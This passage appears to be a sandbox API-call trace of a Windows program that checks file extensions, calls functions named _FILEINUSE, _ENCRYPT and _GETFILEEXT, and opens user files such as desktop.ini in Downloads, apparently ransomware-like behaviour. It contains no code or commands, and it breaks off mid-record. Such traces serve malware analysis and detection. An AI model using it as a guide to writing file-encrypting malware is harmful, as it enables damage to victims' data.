[0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0037.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.112] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="x", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="docx", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.113] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".docx", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.113] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.113] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.114] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a58 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1698 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.114] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4c8 [0037.114] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.115] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0037.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.115] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x60) returned 0x87a9d8 [0037.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.116] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0037.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af608 [0037.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0037.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0037.116] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbc8 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd48 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0037.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18f0 | out: hHeap=0x770000) returned 1 [0037.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0037.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0037.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca48 | out: hHeap=0x770000) returned 1 [0037.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0037.117] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0037.117] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0037.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab0010 [0037.117] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0037.117] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x20c6, lpOverlapped=0x0) returned 1 [0037.117] ReadFile (in: hFile=0x140, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0037.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x20c6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0037.117] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0037.118] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.118] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.118] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.118] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.118] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0037.118] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0037.118] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0037.118] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.118] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.118] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0037.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88cc70 [0037.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88cc70, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0037.119] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ceb0 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0037.119] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.119] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.119] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1378 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0037.119] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.119] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.120] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0037.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0037.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c988, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0037.120] FreeLibrary (hLibModule=0x76e10000) returned 1 [0037.120] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af478 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0037.120] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0037.120] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af438 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0037.120] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0037.120] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0037.120] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0037.120] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0037.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ni", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ini", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0037.121] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ini", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0037.121] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\desktop.ini", lpFindFileData=0x6ae8c0 | out: lpFindFileData=0x6ae8c0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, 